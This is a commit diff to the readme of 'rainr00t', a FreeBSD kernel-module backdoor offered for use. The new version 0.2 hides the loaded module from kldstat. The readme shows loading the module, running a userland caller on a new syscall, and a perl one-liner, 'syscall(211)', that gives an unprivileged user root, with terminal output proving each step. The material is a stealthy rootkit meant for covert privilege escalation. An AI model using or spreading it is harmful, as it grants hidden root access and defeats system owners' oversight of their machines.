version 0.2, added hidefunction so mod is not found anymore easily

rainroot/readme.txt

@@ -1,29 +1,58 @@
 rainr00t
 ========
 
-instant root-priv backd00r via kernelland anyone? 
+instant root-priv backd00r via kernelland anyone? get root and hide the module.
 well this module, once loaded gives the thread/user calling instantly root, without spawning an extra
 shell or alike. 
 
+new feature in version 0.2
+--------------------------
+
+automaticly hiding the loaded module, be aware that you cant easily unload it now ;)
+
 usage
 -----
 
+kernel
+******
 root@crashb0x:~/gainroot # uname -a
 FreeBSD crashb0x 10.1-RELEASE FreeBSD 10.1-RELEASE #0 r274401: Tue Nov 11 21:02:49 UTC 2014     root@releng1.nyi.freebsd.org:/usr/obj/usr/src/sys/GENERIC  amd64
 
 root@crashb0x:~/gainroot # kldload ./rainroot.ko
-
 root@crashb0x:~/gainroot # kldstat
 Id Refs Address            Size     Name
  1    3 0xffffffff80200000 1755658  kernel
- 3    1 0xffffffff81a12000 20e      rainroot.ko
 
-# userland tool, to call the newly loaded syscall (normally its syscall 210)
+No rainroot in kldstat, just the default kernel.
+
+userland
+********
+
+# userland tool, to call the newly loaded syscall (normally its syscall 210, depending if you got extra syscalls on your box already) In this examples it is syscall nr 211.
+
+compile it
 l00ser@crashb0x:/tmp $ gcc48 caller.c -o caller
+
+test for help
+# ./caller 
+rainroot caller
+use appropiate syscallnumber (default: 210)
+example: ./caller 210
+
+execute and get root
 l00ser@crashb0x:/tmp % ./caller 211
 l00ser@crashb0x:/tmp % id
 uid=0(root) gid=0(wheel) egid=1001(l00ser) groups=1001(l00ser)
 
+besides the caller you could also go with every language or operation requesting the syscall. for instance
+ this perl one-liner:
+
+l00ser@crashb0x:~ % id
+uid=1001(l00ser) gid=1001(l00ser) groups=1001(l00ser)
+l00ser@crashb0x:~ % perl -e 'syscall(211);'
+l00ser@crashb0x:~ % id
+uid=0(root) gid=0(wheel) egid=1001(l00ser) groups=1001(l00ser)
+
 author
 ------
 dash